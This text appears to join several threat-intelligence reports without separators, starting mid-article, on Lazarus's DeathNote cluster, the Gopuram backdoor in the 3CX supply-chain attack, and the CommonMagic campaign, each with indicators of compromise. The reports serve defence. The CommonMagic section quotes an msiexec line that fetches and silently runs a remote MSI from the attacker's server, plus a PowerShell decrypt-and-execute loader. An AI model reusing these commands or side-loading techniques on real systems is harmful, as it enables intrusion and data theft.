In addition, the actor refined its infection chain, using the remote template injection technique in their weaponized documents, as well as utilizing Trojanized open-source PDF viewer software. Both of these infection methods result in the same malware (DeathNote downloader), which is responsible for uploading the victim’s information and retrieving the next-stage payload at the C2’s discretion. Finally, a COPPERHEDGE variant is executed in memory.

Infection chain

Notably, a Trojanized PDF reader, based on the open source software, used an interesting technique to initiate its malicious routine. It first retrieves the MD5 hash of the opened PDF file and performs an XOR operation on 65 bytes of embedded data using the retrieved MD5 value. Next, it verifies that the first WORD value of the XORed data is 0x4682, and checks that the MD5 hash value matches the last 16 bytes of the XORed data. If both conditions are met, the remaining 47-bytes value is used as the decryption key for the next stage of infection.

Verification process of Trojanized PDF reader

Finally, this Trojanized PDF viewer overwrites the original opened file with a decoy PDF file and opens it to deceive the victim while implementing the malware payload. The payload is executed with command line parameters, and a shortcut file is created in the Startup folder to ensure persistence. This infection mechanism demonstrates the care and precision with which the actor delivers the payload.

Expanded target and adoption of new infection vector

In May 2021, we observed that an IT company in Europe that provides solutions for monitoring network devices and servers was compromised by the same cluster. It’s believed that the Lazarus group had an interest in this company’s widely used software or its supply chain.

In addition, in early June 2021, the Lazarus group began utilizing a new infection mechanism against targets in South Korea. One thing that caught our attention was that the initial stage of the malware was executed by legitimate security software that is widely used in South Korea. It’s thought that the malware was spread through a vulnerability in this widely used software in South Korea.

Infection chain

Similar to the previous case, the initial infection vector created the downloader malware. Once connected to the C2 server, the downloader retrieved an additional payload based on the operator’s commands and executed it in memory. During this time, the BLINDINGCAN malware was used as a memory-resident backdoor. While the BLINDINGCAN malware has sufficient capabilities to control the victim, the actor manually implanted additional malware. It’s believed that the group aims to create an auxiliary method to control the victim. The retrieved loader’s export function (CMS_ContentInfo) was launched with command line parameters, which is crucial for decrypting the embedded next-stage payload and configuration. This process only proceeds if the length of the parameter is 38. Finally, the COPPERHEDGE malware, previously used by this cluster, was executed on the victim.

Almost one year later, in March 2022, we discovered that the same security program had been exploited to propagate similar downloader malware to several victims in South Korea. However, a different payload was delivered in this case. The C2 operator manually implanted a backdoor twice, and although we were unable to acquire the initially implanted backdoor, we assume it is the same as the backdoor in the following stage. The newly implanted backdoor is capable of executing a retrieved payload with named-pipe communication. In addition, the actor utilized side-loading to execute Mimikatz and used stealer malware to collect keystroke and clipboard data from users.

Infection chain

Around the same time, we uncovered evidence that one defense contractor in Latin America was compromised by the same backdoor. The initial infection vector was similar to what we’ve seen with other defense industry targets, involving the use of a Trojanized PDF reader with a crafted PDF file. However, in this particular case, the actor adopted a side-loading technique to execute the final payload. When the malicious PDF file is opened with the Trojanized PDF reader, the victim is presented with the same malware mentioned above, which is responsible for collecting and reporting the victim’s information, retrieving commands and executing them using pipe communication mechanisms. The actor used this malware to implant additional payloads, including legitimate files for side-loading purposes.

• Legitimate file: %APPDATA%\USOShared\CameraSettingsUIHost.exe
• Malicious file: %APPDATA%\USOShared\dui70.dll
• Config file: %APPDATA%\USOShared\4800-84dc-063a6a41c5c
• Command line: %APPDATA%\USOShared\CameraSettingsUIHost.exe uTYNkfKxHiZrx3KJ

An ongoing attack targeting a defense contractor with updated infection tactics

In July 2022, we observed that the Lazarus group had successfully breached a defense contractor in Africa. The initial infection was a suspicious PDF application, which had been sent via the Skype messenger. After executing the PDF reader, it created both a legitimate file (CameraSettingsUIHost.exe) and malicious file (DUI70.dll) in the same directory. This attack heavily relied on the same DLL side-loading technique that we observed in the previous case. The payload that was initially implanted and executed by the PDF reader was responsible for collecting and reporting the victim’s information, as well as retrieving an additional payload from the remote server named LPEClient. The Lazarus group used this malware several times in various campaigns. They have also utilized the same DLL side-loading technique to implant additional malware that is capable of backdoor operation. In order to move laterally across systems, the actor used an interesting technique called ServiceMove. This technique leverages the Windows Perception Simulation Service to load arbitrary DLL files. According to the author’s explanation, ‘a non-existing DLL file will be loaded every time when the Windows Perception Simulation Service is started’. By creating an arbitrary DLL in C:\Windows\System32\PerceptionSimulation\ and starting the service remotely, the actors were able to achieve code execution as NT AUTHORITY\SYSTEM on a remote system. The actor created a devobj.dll file in the PerceptionSimulation folder and remotely executed the PerceptionSimulation service. Upon launching the devobj.dll file, it decrypted an encrypted backdoor file, PercepXml.dat, from the same folder and executed it in memory.

Infection chain

Post-exploitation

During our investigation of this campaign, we have gained extensive insight into the Lazarus group’s post-exploitation strategy. After initial infection, the operator executed numerous Windows commands to gather basic system information and attempt to find valuable hosts, such as an Active Directory server. Before moving laterally, the Lazarus group acquired Windows credentials using well-known methods, and employed public techniques, such as ServiceMove. When the group completed its mission and began exfiltrating data, they mostly utilized the WinRAR utility to compress files and transmit them via C2 communication channels.

Attribution

After tracking the DeathNote cluster and its origin, we have determined that the Lazarus group is responsible for this malware strain. Our conclusion is supported by many security vendors who also believe that the Lazarus group is linked to this malware. Furthermore, we have analyzed the delivery of Windows commands to the victim through the DeathNote malware, and discovered that a significant number of commands were executed between GMT 00:00 and 07:00. Based on our knowledge of normal working hours, we can infer that the actor is located in either the GMT+08 or GMT+09 time zone.

Timeline of Windows commands

Moreover, the actor left a Korean comment ‘정상호출’, which translates to ‘normal call’ in the C2 script. This further supports the hypothesis that Lazarus is a Korean-speaking actor.

Korean comment in the C2 script

In conclusion, the Lazarus group is a notorious and highly skilled threat actor. Our analysis of the DeathNote cluster reveals a rapid evolution in its tactics, techniques and procedures over the years. As the Lazarus group continues to refine its approaches, it is crucial for organizations to maintain vigilance and take proactive measures to defend against its malicious activities. By staying informed and implementing strong security measures, organizations can reduce the risk of falling victim to this dangerous adversary.

Indicators of Compromise

Beginning of tracking DeathNote

Malicious documents
265f407a157ab0ed017dd18cae0352ae
7a73a2261e20bdb8d24a4fb252801db7
7a307c57ec33a23ce9b5c84659f133cc
ced38b728470c63abcf4db013b09cff7
9121f1c13955506e33894ffd780940cd
50b2154de64724a2a930904354b5d77d
8a05f6b3f1eb25bcbceb717aa49999cd
ee73a772b72a5f3393d4bf577fc48efe

Downloader
d1c652b4192857cb08907f0ba1790976
25b37c971fd7e9e50e45691aa86e5f0a
0493f40628995ae1b7e3ffacd675ba5f
8840f6d2175683c7ed8ac2333c78451a
c278d6468896af3699e058786a8c3d62
9fd35bad075c2c70678c65c788b91bc3
59cb8474930ae7ea45b626443e01b66d
7af59d16cfd0802144795ca496e8111c
cd5357d1045948ba62710ad8128ae282
77194024294f4fd7a4011737861cce3c
e9d89d1364bd73327e266d673d6c8acf
0d4bdfec1e657d6c6260c42ffdbb8cab
5da86adeec6ce4556f477d9795e73e90
706e55af384e1d8483d2748107cbd57c

Manipulated Installer
dd185e2bb02b21e59fb958a4e12689a7

Installer
4088946632e75498d9c478da782aa880 C:\Windows\igfxmon.exe

Injector
dc9244206e72a04d30eeadef23713778 C:\Windows\system32\[random 2 bytes]proc.exe

Backdoor
735afcd0f6821cbd3a2db510ea8feb22 C:\Windows\system32\[random 2 bytes]svc.dll

Shifting focus to the defense industry

Malicious documents
4c239a926676087e31d82e79e838ced1 pubmaterial.docx
183ad96b931733ad37bb627a958837db Boeing_PMS.docx
9ea365c1714eb500e5f4a749a3ed0fe7 Boeing_DSS_SE.docx
2449f61195e39f6264d4244dfa1d1613 Senior_Design_Engineer.docx
880b263b4fd5de0ae6224189ea611023 LM_IFG_536R.docx.docx
e7aa0237fc3db67a96ebd877806a2c88 Boeing_AERO_GS.docx
56470e113479eacda081c2eeead153bf boeing_spectrolab.docx

Fetched template
2efbe6901fc3f479bc32aaf13ce8cf12 pubmaterial.dotm
65df11dea0c1d0f0304b376787e65ccb 43.dotm
0071b20d27a24ae1e474145b8efc9718 17.dotm
1f254dd0b85edd7e11339681979e3ad6 61.dotm

DeathNote downloader
f4b55da7870e9ecd5f3f565f40490996 onenote.db, thumbnail.db
2b02465b65024336a9e15d7f34c1f5d9 wsuser.db
11fdc0be9d85b4ff1faf5ca33cc272ed onenote.db
f6d6f3580160cd29b285edf7d0c647ce
78d42cedb0c012c62ef5be620c200d43 wsuser.db
92657b98c2b4ee4e8fa1b83921003c74
075fba0c098d86d9f22b8ea8c3033207 wsdts.db
8fc7b0764541225e5505fa93a7376df4
7d204793e75bb49d857bf4dbc60792d3 2.dll
eb2dc282ad3ab29c1853d4f6d09bec4f
ca6658852480c70118feba12eb1be880 thumbnail.db
c0a8483b836efdbae190cc069129d5c3 wsdts.db
14d79cd918b4f610c1a6d43cadeeff7b wsuser.db
1bd0ca304cdecfa3bd4342b261285a72

Trojanized PDF viewer
cbc559ea38d940bf0b8307761ee4d67b SumatraPDF.exe
da1dc5d41de5f241cabd7f79fbc407f5 internal pdf viewer.exe

Expanded target and adoption of new infection vector

Racket Downloader
b3a8c88297daecdb9b0ac54a3c107797 SCSKAppLink.dll

BLIDINGCAN
b23b0de308e55cbf14179d59adee5fcb
64e5acf43613cd10e96174f36cb1d680

COPPERHEDGE Loader
a43bdc197d6a273102e90cdc0983b0b9

COPPERHEDGE
97336f5ce811d76b28e23280fa7320b5

Downloader Loader
f821ca4672851f02bead3c4bd23bed84 c:\officecache\officecert.ocx

Racket Downloader
b974bc9e6f375f301ae2f75d1e8b6783 %public%\Libraries\SCSKAppLink.dll
eb061dfacb3667cf65d250911179235d

Stealer
fe549a0185813e4e624104d857f9277b %ProgramData%\GenICam\GenICamKDR.gic

Backdoor Loader
7b8960e2a22c8321789f107a7b83aa59 %ProgramData%\xilinx\xilinx.pkg
0ac90c7ad1be57f705e3c42380cbcccd %ProgramData%\USOShared\USOShare.cpl

Mimikatz Loader
adf0d4bbefccf342493e02538155e611 %ProgramData%\USOShared\log.dll
d4d654c1b27ab90d2af8585052c77f33

An ongoing attack targeting a defense contractor with updated infection tactics

Loader
2bcf464a333d67afeb80360da4dfd5bb C:\Windows\system32\perceptionsimulation\devobj.dll
83dd9b600ed33682aa21f038380a6eab C:\Windows\system32\perceptionsimulation\devobj.dll

ForestTiger(Backdoor)
97524091ac21c327bc783fa5ffe9cd66 ProgramData\adobe\arm\lockhostingframework.dll
9b09ebf52660a9d6deca21965ce52ca1 %appdata%\adobe\arm\DUI70.dll
26c0f0ce33f5088754d88a1db1e6c4a9

Trojanized PDF reader
84cd4d896748e2d52e2e22d1a4b9ee46 SecurePDF.exe

On March 29, Crowdstrike published a report about a supply chain attack conducted via 3CXDesktopApp, a popular VoIP program. Since then, the security community has started analyzing the attack and sharing their findings. The following has been discovered so far:

• The infection is spread via 3CXDesktopApp MSI installers. An installer for macOS has also been trojanized.
• The malicious installation package contains an infected dll library that decrypts a shellcode from the d3dcompiler_47.dll library’s overlay and executes it.
• The decrypted payload extracts C2 server URLs from icons stored in a GitHub repository (the repository is removed).
• The payload connects to one of the C2 servers, downloads an infostealer and starts it.
• The infostealer collects system information and browser history, then sends it to the C2 server.

As we reviewed available reports on the 3CX attack, we began wondering if the compromise concluded with the infostealer or further implants followed. To answer that question, we decided to review the telemetry we had on the campaign. On one of the machines, we observed a DLL named guard64.dll, which was loaded into the infected 3CXDesktopApp.exe process. Interestingly enough, we opened an investigation into a case linked to that DLL on March 21, about a week before the supply chain attack was discovered. A DLL with that name was used in recent deployments of a backdoor that we dubbed “Gopuram” and had been tracking internally since 2020. Three years ago, we were investigating an infection of a cryptocurrency company located in Southeast Asia. During the investigation, we found that Gopuram coexisted on victim machines with AppleJeus, a backdoor attributed to the Korean-speaking threat actor Lazarus.

Over the years, we observed few victims compromised with Gopuram, but the number of infections began to increase in March 2023. As it turned out, the increase was directly related to the 3CX supply chain attack. We found out that the threat actor specifically targeted cryptocurrency companies, dropping the following files on infected machines:

• C:\Windows\system32\wlbsctrl.dll, a malicious library (MD5: 9f85a07d4b4abff82ca18d990f062a84);
• C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TxR.0.regtrans-ms, an encrypted shellcode payload.

Once dropped, wlbsctrl.dll becomes loaded on every startup by the IKEEXT service via DLL hijacking. We further saw DLLs with the names ualapi.dll and ncobjapi.dll being sideloaded into spoolsv.exe and svchost.exe, respectively.

The wlbsctrl.dll library is responsible for decrypting and executing the shellcode stored in the C:\Windows\System32\config\TxR directory. The decryption is notably performed through the CryptUnprotectData API function that uses a different encryption key internally on every machine. This makes it difficult for researchers to decrypt the payload from the file without physical access to the victim machines.

Snippet of the loading function using CryptUnprotectData

The component loaded by the library is Gopuram’s main module. As mentioned above, its name in the export directory is guard64.dll. The job of the main module is to connect to a C2 server and request commands. The backdoor implements commands that allow the attackers to interact with the victim’s file system and create processes on the infected machine. Gopuram was additionally observed to launch in-memory modules. Just like the implants used in the 3CX campaign, Gopuram’s modules are DLL files that include an export function named DllGetClassObject. We have observed nine modules so far:

The discovery of the new Gopuram infections allowed us to attribute the 3CX campaign to the Lazarus threat actor with medium to high confidence. Our attribution is based on the following facts:

• While investigating an attack on a Southeast Asian cryptocurrency company in 2020, we found Gopuram coexisting on the same machine with the AppleJeus backdoor, which is attributed to Lazarus.

• The Gopuram backdoor has been observed in attacks on cryptocurrency companies, which is aligned with the interests of the Lazarus threat actor.

• While looking for additional implants that used the same loader shellcode as the 3CX implants, we discovered a sample on a multiscanner service (MD5: 933508a9832da1150fcfdbc1ca9bc84c) loading a payload that uses the wirexpro[.]com C2 server. The same server is listed as an IoC for an AppleJeus campaign by Malwarebytes.

  

  First bytes of the loader shellcode used in 3CX and AppleJeus

  Note, though, that the shellcode is based on open-source code that has been used by other threat actors, for example, SilentBreak. Still, the use of that shellcode along with the 0xF558F4DA constant (which is the ROR13 hash for the string DllGetClassObject) is a more unique pattern.

• While investigating a malicious MSI file (MD5: ec3f99dd7d9dbce8d704d407b086e84f) that has been uploaded to a multiscanner service, we observed the following two events:

  • The dll library dropped from the MSI was observed to launch an in-memory payload that contacts the oilycargo[.]com domain. This domain name has previously been attributed to Lazarus by multiple researchers.

  • In our telemetry, we observed AvBugReport.exe, the executable hosting dll, to contain Gopuram’s main module payload, guard64.dll.

These four facts allow us to conclude that Lazarus is likely the threat actor deploying the Gopuram backdoor.

As for the victims in our telemetry, installations of the infected 3CX software are located all over the world, with the highest infection figures observed in Brazil, Germany, Italy and France.

As the Gopuram backdoor has been deployed to less than ten infected machines, it indicates that attackers used Gopuram with surgical precision. We additionally observed that the attackers have a specific interest in cryptocurrency companies.

As it turns out, the infostealer is not the only malicious payload deployed during the 3CX supply chain attack. The threat actor behind Gopuram additionally infects target machines with the full-fledged modular Gopuram backdoor. We believe that Gopuram is the main implant and the final payload in the attack chain. Our investigation of the 3CX campaign is still far from complete. We will continue analyzing the deployed implants to find out more details about the toolset used in the supply chain attack.

Gopuram indicators of compromise

MD5 hashes
9f85a07d4b4abff82ca18d990f062a84
96d3bbf4d2cf6bc452b53c67b3f2516a

File paths
C:\Windows\System32\config\TxR\<machine hardware profile GUID>.TxR.0.regtrans-ms
C:\Windows\system32\catroot2\edb.chk.log

More indicators of compromise and YARA rules for detecting Gopuram components are available for TIP subscribers. Contact intelreports@kaspersky.com for more details.

Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.

In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:

• A decoy document (we discovered PDF, XLSX and DOCX versions)
• A malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened

Malicious ZIP archive

Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named “Приказ Минфина ДНР № 176.pdf.lnk” (Ministry of Finance Decree No. 176), and the decoy document explicitly referenced it by name in the text.

Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 176)

The ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online

Known attachment names, redacted to remove personal information:

When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.

Infection chain

Infection chain

Installation workflow

The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable.

%WINDIR%\System32\msiexec.exe /i 
http://185.166.217[.]184/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA/attachment.msi /quiet

The MSI file is effectively a dropper package, containing an encrypted next-stage payload (service_pack.dat), a dropper script (runservice_pack.vbs) and a decoy document that is supposed to be displayed to the victim.

Files contained in attachment.msi

The encrypted payload and the decoy document are written to the folder named %APPDATA%\WinEventCom. The VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.

Decryption of service_pack.dat

$inst="$env:APPDATA\WinEventCom\service_pack.dat";
if (!(Test-Path $inst)){
	return;
}
$binst=[System.IO.File]::ReadAllBytes($inst);
$xbinst=New-Object Byte[] $binst.Count;
for ($i=0;$i-lt$binst.Count;$i++) {
	$xbinst[$i]=$binst[$i]-bxor0x13;
	$xbinst[$i]=$binst[$i]-bxor0x55;
	$xbinst[$i]=$binst[$i]-bxor0xFF;
	$xbinst[$i]=$binst[$i]-bxor0xFF;
};
Try {
	[System.Text.Encoding]::ASCII.GetString($xbinst)|iex;
}
Catch {};
Start-Sleep 3;
Remove-Item -Path $inst -Force

The next-stage script finalizes the installation: it opens the decoy document to display it to the user, writes two files named config and manutil.vbs to %APPDATA%\WinEventCom, and creates a Task Scheduler job named WindowsActiveXTaskTrigger, to execute the wscript.exe%APPDATA%\WinEventCom\manutil.vbs command every day.

The PowerMagic backdoor

The script manutil.vbs, which is dropped by the initial package, is a loader for a previously unknown backdoor written in PowerShell that we named PowerMagic. The main body of the backdoor is read from the file %APPDATA%\WinEventCom\config and decrypted with a simple XOR (key: 0x10).

Snippet of PowerMagic’s code containing the “powermagic” string

$AppDir='powermagic';
$ClinetDir='client';
$ClinetTaskDir='task';
$ClinetResultDir='result';
$ClientToken=redacted
$dbx_up='https://content.dropboxapi.com/2/files/upload';
$dbx_down = 'https://content.dropboxapi.com/2/files/download';

When started, the backdoor creates a mutex – WinEventCom. Then, it enters an infinite loop communicating with its C&C server, receiving commands and uploading results in response. It uses OneDrive and Dropbox folders as transport, and OAuth refresh tokens as credentials.

Every minute the backdoor performs the following actions:

1. Modifies the heartbeat file located at /$AppDir/$ClientDir/<machine UID> (the values of the $AppDir and $ClientDir PowerShell variables may differ between samples). The contents of this file consist of the backdoor PID and a number incremented by one with each file modification.
2. Downloads commands that are stored as a file in the /$AppDir/$ClientTaskDir directory.
3. Executes every command as a PowerShell script.
4. Uploads the output of the executed PowerShell command to the cloud storage, placing it in the /$AppDir/$ClientResultDir/<victim machine UUID>.<timestamp> file.

The CommonMagic framework

As it turned out, PowerMagic was not the only malicious toolkit used by the actor. All the victims of PowerMagic were also infected with a more complicated, previously unseen, modular malicious framework that we named CommonMagic. This framework was deployed after initial infection with the PowerShell backdoor, leading us to believe that CommonMagic is deployed via PowerMagic.

The CommonMagic framework consists of several executable modules, all stored in the directory C:\ProgramData\CommonCommand. Modules start as standalone executable files and communicate via named pipes. There are dedicated modules for interaction with the C&C server, encryption and decryption of the C&C traffic and various malicious actions.

The diagram below illustrates the architecture of the framework.

Framework architecture

Network communication

The framework uses OneDrive remote folders as a transport. It utilizes the Microsoft Graph API using an OAuth refresh token embedded into the module binary for authentication. The RapidJSON library is used for parsing JSON objects returned by the Graph API.

A dedicated heartbeat thread updates the remote file <victim ID>/S/S.txt every five minutes with the local timestamp of the victim.

Then, in separate threads, the network communication module downloads new executable modules from the directory <victim ID>/M and uploads the results of their execution to the directory <victim ID>/R.

The data exchanged with the operator via the OneDrive location is encrypted using the RC5Simple open-source library. By default, this library uses the seven-byte sequence “RC5SIMP” at the beginning of the encrypted sequence, but the developers of the backdoor changed it to “Hwo7X8p”. Encryption is implemented in a separate process, communicating over the pipes named \\.\pipe\PipeMd and \\.\pipe\PipeCrDtMd.

Plugins

So far, we have discovered two plugins implementing the malicious business logic. They are located in the directory C:\ProgramData\CommonCommand\Other.

• Screenshot (S.exe) – takes screenshots every three seconds using the GDI API
• USB (U.exe) – collects the contents of the files with the following extensions from connected USB devices: .doc, .docx. .xls, .xlsx, .rtf, .odt, .ods, .zip, .rar, .txt, .pdf.

To be continued

So far, we have found no direct links between the samples and data used in this campaign and any previously known actors. However, the campaign is still active, and our investigation continues. So, we believe that further discoveries may reveal additional information about this malware and the threat actor behind it.

CommonMagic indicators of compromise

Lure archives
0a95a985e6be0918fdb4bfabf0847b5a новое отмена решений уик 288.zip (new cancellation of resolution local election committee 288.zip)
ecb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip (making changes to several russian federation laws.zip)
765f45198cb8039079a28289eab761c5 гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip)
ebaf3c6818bfc619ca2876abd6979f6d цик 3638.zip (central election committee 3638.zip)
1032986517836a8b1f87db954722a33f сз 14-1519 от 10.08.22.zip (memo 14-1519 dated 10.08.22.zip)
1de44e8da621cdeb62825d367693c75e приказ минфина днр № 176.zip (dpr ministry of finance order #176.zip)

PowerMagic installer
fee3db5db8817e82b1af4cedafd2f346 attachment.msi

PowerMagic dropper
bec44b3194c78f6e858b1768c071c5db service_pack.dat

PowerMagic loader
8c2f5e7432f1e6ad22002991772d589b manutil.vbs

PowerMagic backdoor
1fe3a2502e330432f3cf37ca7acbffac

CommonMagic loader
ce8d77af445e3a7c7e56a6ea53af8c0d All.exe

CommonMagic cryptography module
9e19fe5c3cf3e81f347dd78cf3c2e0c2 Clean.exe

CommonMagic network communication module
7c0e5627fd25c40374bc22035d3fadd8 Overall.exe

Distribution servers
webservice-srv[.]online
webservice-srv1[.]online
185.166.217[.]184